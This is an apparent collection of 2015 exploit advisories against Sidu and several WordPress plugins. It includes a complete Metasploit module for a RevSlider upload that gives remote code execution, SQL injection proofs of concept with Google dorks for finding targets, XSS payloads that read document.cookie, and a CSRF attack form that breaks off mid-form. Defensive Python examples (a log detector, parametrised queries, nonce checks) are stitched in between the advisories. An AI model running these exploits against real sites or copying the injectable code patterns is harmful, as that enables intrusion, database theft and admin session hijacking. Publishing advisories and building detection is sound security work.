
15 May 2015

Sidu 5.2 Admin XSS Vulnerability

Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
May 12, 2015: Vendor Notification
May 13, 2015: Public Disclosure
 
Severity Level:
===============
High
 
Description:
============
 
Request Method(s):       [+] GET
Vulnerable Product:      [+] Sidu 5.2
Vulnerable Parameter(s): [+] sql=[XSS]
Affected Area(s):        [+] Admin of currently logged in user.
==============================
 
(hyp3rlinx)


15 May 2015

WordPress RevSlider 3.0.95 File Upload / Execute

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef', # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end
 
  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end
 
  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
 
    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)
 
    # Build the POST body
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
    post_data = data.to_s
 
    res = send_request_cgi(
      'uri'     => wordpress_url_admin_ajax,
      'method'  => 'POST',
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    )
 
    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself is almost never deleted, but try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')
        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end
 
  end
end
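A defender reading the module above mostly wants to know what its use leaves behind in the web server log. The following script is an added example, not part of the Metasploit module or of this page: it parses a few constructed combined-format access-log lines and flags the two traces the module's own code implies, a request for a .php file under /wp-content/plugins/revslider/temp/update_extract/ (the directory the module says the payload lands in), escalated when the same client POSTed to admin-ajax.php shortly before, and a fetch of revslider/release_log.txt (the file the check method reads to fingerprint the version). IP addresses, timestamps and the random payload name are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache/nginx "combined" format; IPs, times and the
# payload file name are made up for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [15/May/2015:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 22 "-" "Mozilla/5.0"
203.0.113.10 - - [15/May/2015:10:01:03 +0000] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/kqzp.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2015:10:05:00 +0000] "GET /wp-content/plugins/revslider/release_log.txt HTTP/1.1" 200 1840 "-" "curl/7.38.0"
192.0.2.44 - - [15/May/2015:10:07:30 +0000] "GET /wp-content/uploads/2015/05/banner.jpg HTTP/1.1" 200 51234 "http://example.org/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# (rule name, base severity, path pattern)
RULES = [
    ("revslider_update_extract_php", "high",
     re.compile(r'^/wp-content/plugins/revslider/temp/update_extract/.*\.php(\?|$)', re.I)),
    ("revslider_release_log_probe", "low",
     re.compile(r'^/wp-content/plugins/revslider/release_log\.txt(\?|$)', re.I)),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def scan(log_text, window=timedelta(seconds=60)):
    """Return a list of findings for the log text, in log order."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    findings = []
    for i, entry in enumerate(entries):
        for name, severity, pattern in RULES:
            if not pattern.search(entry["path"]):
                continue
            finding = {"ip": entry["ip"], "path": entry["path"], "rule": name,
                       "severity": severity, "correlated_upload": False}
            if name == "revslider_update_extract_php":
                # The module uploads via a POST to admin-ajax.php and then fetches the
                # dropped file: a POST from the same client just before is the strongest signal.
                for prev in entries[:i]:
                    if (prev["ip"] == entry["ip"] and prev["method"] == "POST"
                            and prev["path"].startswith("/wp-admin/admin-ajax.php")
                            and entry["ts"] - prev["ts"] <= window):
                        finding["correlated_upload"] = True
                        finding["severity"] = "critical"
                        break
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["rule"], f["ip"], f["path"])
```

A plain regex over the URL path is enough here because the extraction directory is never requested in normal use; the admin-ajax.php POST body (action=revslider_ajax_action) is not visible in an access log, which is why the correlation is done on timing and client address rather than on the request content.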


15 May 2015

WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
    Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
    Unauthenticated SQL injection in ajax call when the plugin is counting
the times a product is being seen by the web visitors. The vulnerable POST
parameter is "Item_ID".
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
 
3. Vulnerable code:
 
    In file Functions/Process_Ajax.php line 67:
 
    [...]
    $Item_ID = $_POST['Item_ID'];
    $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID);
    [...]
 
4. Proof of concept:
 
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: <wordpress host>
    [...]
    Cookie: wordpress_f305[...]
 
    Item_ID=2 AND SLEEP(5)&action=record_view
 
5. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45
 
 
 
--------
ISSUE 2:
 
 
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
     Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
 Unauthenticated SQL injection in parameter "SingleProduct" when a web
visitor views a product published by the web administrator.
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
 
3. Vulnerable code:
 
    File Functions/Shortcodes.php line 779
 
4. Proof of concept
 
    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b
 
5. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45


15 May 2015

WordPress Freshmail 1.5.8 SQL Injection

------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a SQL injection vulnerability reachable by collaborators (or
higher-privileged users) on sites with the Freshmail plugin installed. The SQL
injection is located in the attribute "id" of the inserted shortcode
[FM_form id="N"]. The shortcode attribute "id" is not sanitized before
being inserted into a SQL query.
 
A collaborator can insert shortcodes while editing a new post or page and
can preview the result (no administrator approval needed), which triggers
this SQL injection.
 
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contacted the developer company via Twitter.
- 05/05/2015: Sent the details by e-mail to the developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/shortcode.php, lines 27 and 120:
 
Line 19:  function fm_form_func($atts)
[...]
Line 27:  $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
 
 
4. Proof of concept
---------------------------
 
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
 
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
 
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
 
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
 
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
 
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
 
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
 
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
 
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
 
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
 
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
 
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
 
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
 
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
 
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
 
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL--
 
 
5. Solution
---------------
 
Update to version 1.6
 
 
------------------------
ISSUE 2:
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is an unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" forms shown to web visitors, in the POST parameter
fm_form_id.
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contacted the developer company via Twitter.
- 05/05/2015: Sent the details by e-mail to the developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
 
[...]
Line 28:  add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29:  add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44:  $result = $_POST;
[...]
Line 50:  $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id="'.$result['fm_form_id'].'";');
[...]
 
4. Proof of concept
---------------------------
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
 
form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F
 
5. Explanation
---------------------
 
A page visitor can submit an email (fake@fake.com) to subscribe to the
form with fm_form_id="1", and the JSON message received will be similar to:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Your sign up request was successful! Please check your email inbox."}
 
The second time the visitor tries the same with the same email, the message
returned will be:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Given email address is already subscribed, thank you!"}
 
If we insert 1" and substr(user(),1,1)="a we'll receive either the same
message indicating that the given email is already subscribed, which means
that the first character of the username is an "a", or a null message,
which means that the first character of the username is not an "a".
 
6. Solution
---------------
 
Update to version 1.6
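All four injections on this page (Ultimate Product Catalogue's Item_ID and SingleProduct, Freshmail's shortcode id and fm_form_id) have the same root cause: a request value is concatenated into the SQL text, so the "true" and "false" PoC variants make the query answer differently. The following Python script is an added example, not code from either plugin or from the advisories; it uses an in-memory sqlite3 table as a constructed stand-in for the plugins' MySQL tables and shows the vulnerable construction next to the two fixes a plugin author would apply, a parametrised query (the WordPress equivalent is $wpdb->prepare()) and a type check for integer identifiers (absint()). sqlite has no SLEEP(), so the time-based Item_ID variant is covered only by the type check.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the plugins' tables (not their real schema), kept in
    # memory so the example runs offline.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (Item_ID INTEGER PRIMARY KEY, Item_Name TEXT, Item_Views INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Widget", 10), (2, "Gadget", 25)],
    )
    return conn


def vulnerable_lookup(conn, single_product):
    # Same construction as the advisories: the request value is glued into the SQL
    # text, so a quote inside the value closes the literal and the remainder is
    # parsed as SQL. (Freshmail wraps the value in double quotes; same mechanism.)
    sql = "SELECT Item_ID, Item_Name FROM products WHERE Item_ID='" + single_product + "'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, single_product):
    # Parametrised query: the driver binds the value, so it can never alter the
    # statement's structure, whatever characters it contains.
    return conn.execute(
        "SELECT Item_ID, Item_Name FROM products WHERE Item_ID = ?", (single_product,)
    ).fetchone()


def safe_lookup_int(conn, item_id):
    # Item_ID is numeric, so additionally validate the type: anything that is not
    # an integer is rejected before a query is even built.
    try:
        n = int(item_id)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT Item_ID, Item_Name FROM products WHERE Item_ID = ?", (n,)
    ).fetchone()


def compare(inputs):
    # For each input, what every variant answers. Only the vulnerable variant's
    # answer depends on the truth of an injected condition.
    conn = make_db()
    return {
        value: {
            "vulnerable": vulnerable_lookup(conn, value),
            "parametrised": safe_lookup(conn, value),
            "validated": safe_lookup_int(conn, value),
        }
        for value in inputs
    }


if __name__ == "__main__":
    # A legitimate id plus the two SingleProduct PoC values from the advisory above.
    for value, answers in compare(["2", "2' and 'a'='a", "2' and 'a'='b"]).items():
        print(repr(value), answers)
```

With the vulnerable lookup the first PoC value returns the product row and the second returns nothing, which is exactly the boolean oracle the Freshmail explanation describes; with either fix both injected values return nothing, because the whole string is compared against Item_ID as data.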


9 May 2015

WordPress Ad Inserter 1.5.2 CSRF / XSS

================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
 
Overview
========
 
* Title: CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version 1.5.2 and most likely prior versions
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About Vulnerability
-------------------
This plugin is vulnerable to a combined CSRF/XSS attack: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, for example by hijacking the admin's cookies.
 
Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
1. Goto Dashboard --> Setting -->   Ad Inserter --> Block1
 
2. Insert this payload ## "> <img src="/" =_=" title="onerror='prompt(document.cookie)'"> ## into the vulnerable parameter mentioned above, save the settings and see the XSS in action.
 
3. Visit Ad Inserter settings page of this plugin anytime later and you can see the script executing as it is stored.
 
The plugin does not use any nonces, hence the same settings can also be changed through a CSRF attack; the PoC code for this is below.
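The two halves of this finding have two separate fixes: a per-user, per-action nonce on the settings form closes the CSRF, and escaping the stored block name on output defuses the stored XSS. The following Python script is an added example, not code from the Ad Inserter plugin or from the advisory; it models a save handler the way the advisory describes version 1.5.2 (no nonce, value stored and rendered as received) next to a fixed handler. The nonce scheme is modelled on WordPress's wp_create_nonce()/wp_verify_nonce() (HMAC over a time tick, the action and the user id, valid for two half-life ticks) but is a simplified reimplementation; the secret, the action name "ad_inserter_save" and the form field name are assumptions for the demo.

```python
import hashlib
import hmac
import html
import time

# Constructed secret for this demo only; WordPress derives its nonce key from the
# salts in wp-config.php.
SECRET = b"constructed-demo-secret"
NONCE_LIFE = 12 * 60 * 60  # 12 hours, checked in two half-life ticks like WordPress
SAVE_ACTION = "ad_inserter_save"  # assumed action name, not the plugin's


def _tick(now):
    return int(now // (NONCE_LIFE / 2))


def create_nonce(action, user_id, now=None):
    # Modelled on wp_create_nonce(): bind the token to a time window, the action
    # and the user, so it is useless for other forms, other accounts or later.
    now = time.time() if now is None else now
    msg = f"{_tick(now)}|{action}|{user_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:10]


def verify_nonce(nonce, action, user_id, now=None):
    # Modelled on wp_verify_nonce(): accept the current and the previous tick only.
    if not nonce:
        return False
    now = time.time() if now is None else now
    for tick in (_tick(now), _tick(now) - 1):
        msg = f"{tick}|{action}|{user_id}".encode()
        expected = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:10]
        if hmac.compare_digest(nonce, expected):
            return True
    return False


def save_settings_vulnerable(post, store):
    # Ad Inserter 1.5.2 as described: any POST is accepted, value stored verbatim.
    store["ad1_name"] = post.get("ad1_name", "")
    return True


def save_settings_fixed(post, store, user_id, now=None):
    # CSRF fix: refuse the save unless the form carried a valid nonce for this
    # action and this user (WordPress: wp_nonce_field() + check_admin_referer()).
    if not verify_nonce(post.get("_wpnonce"), SAVE_ACTION, user_id, now):
        return False
    store["ad1_name"] = post.get("ad1_name", "")
    return True


def render_name_field_vulnerable(store):
    # Stored value written back into the settings page unescaped: the payload's
    # leading quote ends the attribute and the rest becomes markup.
    return '<input type="text" name="ad1_name" value="%s">' % store.get("ad1_name", "")


def render_name_field_fixed(store):
    # Stored-XSS fix: escape on output, including quotes (WordPress: esc_attr()).
    return '<input type="text" name="ad1_name" value="%s">' % html.escape(
        store.get("ad1_name", ""), quote=True
    )


if __name__ == "__main__":
    payload = '"> <img src="/" =_=" title="onerror=\'prompt(document.cookie)\'">'
    store = {}
    print("forged POST accepted by fixed handler:",
          save_settings_fixed({"ad1_name": payload}, store, user_id=4))
    save_settings_vulnerable({"ad1_name": payload}, store)
    print(render_name_field_vulnerable(store))
    print(render_name_field_fixed(store))
```

A request forged from another origin cannot carry a valid nonce because the attacker never sees one for the victim's session, so the fixed handler rejects it before anything is stored; and even if a malicious value does get stored, escaping it on output keeps it inert text inside the attribute. Both fixes are needed: the nonce does nothing for an admin who pastes the payload themselves, and escaping does nothing for settings the attacker changed that are not rendered.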
 
CSRF POC Code
=============
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/options-general.php?page=ad-inserter.php" method="POST">
      <input type="hidden" name="ad_save" value="Save All Settings" />
      <input type="hidden" name="ad1_name" value="<img src="/" =_=" title="onerror='prompt(document.cookie)'">" />
      <input type="hidden" name="ad1_process_php" value="0" />
      <input type="hidden" name="ad1_data" value="" />
      <input type="hidden" name="ad1_displayType" value="None" />
      <input type="hidden" name="ad1_display_for_users" value="all" />
      <input type="hidden" name="ad1_display_for_devices" value="all" />
      <input type="hidden" name="ad1_floatType" value="None" />
      <input type="hidden" name="ad1_custom_css" value="" />
      <input type="hidden" name="ad1_widget_settings_post" value="0" />
      <input type="hidden" name="ad1_widget_settings_post" value="1" />
      <input type="hidden" name="ad1_widget_settings_page" value="0" />
      <input type="hidden" name="ad1_widget_settings_home" value="0" />
      <input type="hidden" name="ad1_widget_settings_home" value="1" />
      <input type="hidden" name="ad1_widget_settings_category" value="0" />
      <input type="hidden" name="ad1_widget_settings_category" value="1" />
      <input type="hidden" name="ad1_widget_settings_search" value="0" />
      <input type="hidden" name="ad1_widget_settings_search" value="1" />
      <input type="hidden" name="ad1_widget_settings_archive" value="0" />
      <input type="hidden" name="ad1_widget_settings_archive" value="1" />
      <input type="hidden" name="ad1_after_day" value="0" />
      <input type="hidden" name="ad1_general_tag" value="gadgets" />
      <input type="hidden" name="ad1_block_user" value="" />
      <input type="hidden" name="ad1_domain_list_type" value="Black List" />
      <input type="hidden" name="ad1_block_cat" value="" />
      <input type="hidden" name="ad1_block_cat_type" value="Black List" />
      <input type="hidden" name="ad1_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad1_paragraph_text" value="" />
      <input type="hidden" name="ad1_paragraphNumber" value="0" />
      <input type="hidden" name="ad1_directionType" value="From Top" />
      <input type="hidden" name="ad1_excerptNumber" value="0" />
      <input type="hidden" name="ad1_enable_manual" value="0" />
      <input type="hidden" name="ad1_enable_php_call" value="0" />
      <input type="hidden" name="ad2_name" value="Block 2" />
      <input type="hidden" name="ad2_process_php" value="0" />
      <input type="hidden" name="ad2_data" value="" />
      <input type="hidden" name="ad2_displayType" value="None" />
      <input type="hidden" name="ad2_display_for_users" value="all" />
      <input type="hidden" name="ad2_display_for_devices" value="all" />
      <input type="hidden" name="ad2_floatType" value="None" />
      <input type="hidden" name="ad2_custom_css" value="" />
      <input type="hidden" name="ad2_widget_settings_post" value="0" />
      <input type="hidden" name="ad2_widget_settings_post" value="1" />
      <input type="hidden" name="ad2_widget_settings_page" value="0" />
      <input type="hidden" name="ad2_widget_settings_home" value="0" />
      <input type="hidden" name="ad2_widget_settings_home" value="1" />
      <input type="hidden" name="ad2_widget_settings_category" value="0" />
      <input type="hidden" name="ad2_widget_settings_category" value="1" />
      <input type="hidden" name="ad2_widget_settings_search" value="0" />
      <input type="hidden" name="ad2_widget_settings_search" value="1" />
      <input type="hidden" name="ad2_widget_settings_archive" value="0" />
      <input type="hidden" name="ad2_widget_settings_archive" value="1" />
      <input type="hidden" name="ad2_after_day" value="0" />
      <input type="hidden" name="ad2_general_tag" value="gadgets" />
      <input type="hidden" name="ad2_block_user" value="" />
      <input type="hidden" name="ad2_domain_list_type" value="Black List" />
      <input type="hidden" name="ad2_block_cat" value="" />
      <input type="hidden" name="ad2_block_cat_type" value="Black List" />
